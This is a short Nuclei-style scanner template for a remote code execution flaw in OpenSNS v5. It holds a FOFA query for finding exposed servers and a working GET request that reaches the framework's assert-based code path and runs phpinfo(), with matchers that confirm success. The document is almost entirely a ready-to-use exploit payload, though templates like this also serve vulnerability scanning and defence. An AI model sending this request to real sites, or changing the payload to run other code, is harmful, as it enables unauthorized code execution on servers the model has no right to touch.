id: opensns-v5-rce

info:
  name: OpenSNS v5 RCE
  author: zp857
  severity: critical
  tags: opensns,rce
  metadata:
    fofa-query: 'body="d6023daa6c7467634636c87b3f16213e" || title="OpenSNS"'

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=->_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Version"

      - type: status
        status:
          - 200